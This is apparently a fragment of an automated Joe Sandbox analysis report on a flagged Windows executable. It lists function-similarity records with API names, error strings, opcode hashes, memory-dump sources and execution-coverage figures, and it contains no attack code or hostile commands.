                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                                                                                                                            • API String ID: 1878133881-2410924014
                                                                                                                                                                                                                                                            • Opcode ID: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                                                                                                                                                                                                                            • Instruction ID: e10f78bf23fabc1ae6939817759f7c959a650bd915c27e413968cfa486f3448d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 88149bfc2a28579845b544d32f14f9b1101eddfde92b8430b51e14ba55e9a319
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1F310F62628A8295F720EB10EC519EBA364FF84B84FC04076E68D46A99DF3CD606CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,00007FF72AA739CA), ref: 00007FF72AA73EE1
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF72AA788E2,?,?,?,?,?,?,?,?,?,?,?,00007FF72AA7101D), ref: 00007FF72AA729F4
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA729C0: MessageBoxW.USER32 ref: 00007FF72AA72AD0
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                                                                                                                            • Opcode ID: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                                                                                                                                                                                                                            • Instruction ID: 2aba8cdaa1f97c6af2d99ab736241a4a425795e1de937949e0e1088d1f6f0259
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a0f4ac4870535fdd3da745cd16929a0880a6c5442cdd0bc39b12d524b6311160
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4E012551B1974381FBA1B720EC15BBE9271EF487C4FC004B2D94E8A696EE1CE6478E30
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2718003287-0
                                                                                                                                                                                                                                                            • Opcode ID: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                                                                                                                                                                                                                            • Instruction ID: b51d2c9c5e8f8d5f7b0c1e005e34fc04de10460a999f61ac92c60e37e9c9682c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0a0d81bfe4120ef9cba8412760d98f6ac5c5ee8295e8d3c135a36233c03d6874
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D7D1DF72B08B418EF710DF65D840AACB7B5EF44B98F844266CE4E97B89DA38D417CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 1956198572-0
                                                                                                                                                                                                                                                            • Opcode ID: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                                                                                                                                                                                                                            • Instruction ID: 66ec2f36f808bfec36c81eae67946f8af06123f461807d54997b88f95ded12d7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b05b5568a63e2e2d0baaa3588e58b47743bee96d0fa3dc0d735729d29a60f88b
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B911A921B0854382F754AB69ED44ABFD2B1EF85B80FC48071DA4906B9ECD3CD5CA4A10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: ?
                                                                                                                                                                                                                                                            • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                                            • Opcode ID: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                                                                                                                                                                                                                            • Instruction ID: 342230acaed5b3404714ea76ee1b22ad33ca15de2584ef796fea4af5b80d1137
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f7308ed130ebcec51d7c207d98fe8ad99d28455c8954ade1b0b7718248787264
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3B410712A082C346F764AB29DC01F7AE670EF80BA4F904275EE9D06AD5DF3DD5428F10
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • _invalid_parameter_noinfo.LIBCMT ref: 00007FF72AA89BB6
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4EC: RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B502
                                                                                                                                                                                                                                                              • Part of subcall function 00007FF72AA8B4EC: GetLastError.KERNEL32(?,?,?,00007FF72AA93972,?,?,?,00007FF72AA939AF,?,?,00000000,00007FF72AA93E75,?,?,00000000,00007FF72AA93DA7), ref: 00007FF72AA8B50C
                                                                                                                                                                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF72AA7C125), ref: 00007FF72AA89BD4
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            • C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe, xrefs: 00007FF72AA89BC2
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLanguagesLastModuleNamePreferredRestoreThread_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Evo-gen.8568.15352.exe
                                                                                                                                                                                                                                                            • API String ID: 2553983749-1626245527
                                                                                                                                                                                                                                                            • Opcode ID: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                                                                                                                                                                                                                            • Instruction ID: f5f5bbfee3a913cea7788760c49f95a9f0ea93eac21dd6bd3d90ecac2acfe96d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e02605a42b068f6eccedcb3010d95b522989991cdee656cc9b719bfc68919b09
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 36416032A08B1289FB15FF259C858B8A7B4FF44B94F9440B5EA0E43B45DE3DD4968A60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                                            • String ID: U
                                                                                                                                                                                                                                                            • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                                            • Opcode ID: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                                                                                                                                                                                                                            • Instruction ID: 5909c1115734ddb161a9f3351190b245f47ef4aac48c789d7b19c4169182f7bf
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c4d8f885a23e91b6f023f5bba01b3d5456b675b65fc2396528dfcf9b2bee20e
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7241C222A18B4186EB609F25EC44BBAB771FF84794F804035EA4D87788EF3CD502CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: CurrentDirectory
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                                            • Opcode ID: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                                                                                                                                                                                                                            • Instruction ID: 4806b7f2d157855ee99e23a008d6fa0e5fe03c9b749ba965fee05f48fab18b17
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c814f4e6a73fca8fb0e34a5fa34791fb923e44da2351119a4fd3a89c16c72e66
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2821A223A0868289FB20AB11D844A6DF3B1FF84B44FD58076DA8D47685DF7CE946CE60
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Error detected
                                                                                                                                                                                                                                                            • API String ID: 1878133881-3513342764
                                                                                                                                                                                                                                                            • Opcode ID: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
                                                                                                                                                                                                                                                            • Instruction ID: 9d315fe89d17eadfd0424abcfa411dda4c336213f3049f0fc43bb6fc1c85bd44
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 04587b85e8c5a5f01c124244adb340557da1a3c376205467b785ddfdae2ba4e1
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 17212F72628A8291F760EB10EC51AEFA364FF84784FC05176D64D47A59DF3CD206CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Message$ByteCharMultiWide
                                                                                                                                                                                                                                                            • String ID: Fatal error detected
                                                                                                                                                                                                                                                            • API String ID: 1878133881-4025702859
                                                                                                                                                                                                                                                            • Opcode ID: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                                                                                                                                                                                                                            • Instruction ID: 87b160c95b127d86d9f6130b520931789d204a310b761de2756c9f2200ac5e8a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b6f7d9423fd809a91d1653bcdf9902987ab7b8a697f00e322c081d77e498ae58
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 9E212F72628A8291F720AB10EC51AEBA364FF84788FC05175D64D46A69DF3CD206CB50
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                                            • String ID: csm
                                                                                                                                                                                                                                                            • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                                            • Opcode ID: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                                                                                                                                                                                                                            • Instruction ID: 3701db29b6239c9532c84d355f541d3c0a2a6c64ccb06ed1f5111006d496490a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c8cc4bb08b20690d02c8bce5cff6a9b5d4d552f887a177c474232a7ea1470dcf
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 83112B32618B8182EB619F25F940669B7E4FF88B94F984270EECD07B65DF3CD5528B00
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2004759392.00007FF72AA71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF72AA70000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004732372.00007FF72AA70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004794570.00007FF72AA9C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAAF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004824116.00007FF72AAB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2004877665.00007FF72AAB3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7ff72aa70000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                                            • String ID: :
                                                                                                                                                                                                                                                            • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                                            • Opcode ID: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                                                                                                                                                                                                                            • Instruction ID: a7e44472b938551f81379fb73f32cc4a116abf25d57c35b248b6c42b263c1767
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0bb087a2c4c4f6707d1aaf47450714c5cfb5908953c580e39f9c8bdb8a3b6409
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B101A76291C60389F720BF609C62ABEE3B0EF44744FC00075DA4D46681DF3CD606CE64
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000022.00000003.1758727745.0000021F3FD50000.00000010.00000800.00020000.00000000.sdmp, Offset: 0000021F3FD50000, based on PE: false
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_34_3_21f3fd50000_mshta.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                            • Instruction ID: ad81cd201ae4d306967353cd22a3213927f47660595ad579313fa783cd146cf7
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1415cf9a5ff05e0c22260e06ba58a54442f36ca97d8c14ea786cf574e69d5164
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 389004154DD44755D45411D11D5D3DC504073DC150FD545D04C3FD0154D54D43D711D3
                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                            Execution Graph

                                                                                                                                                                                                                                                            Execution Coverage:10.7%
                                                                                                                                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                                            Signature Coverage:0%
                                                                                                                                                                                                                                                            Total number of Nodes:2000
                                                                                                                                                                                                                                                            Total number of Limit Nodes:51
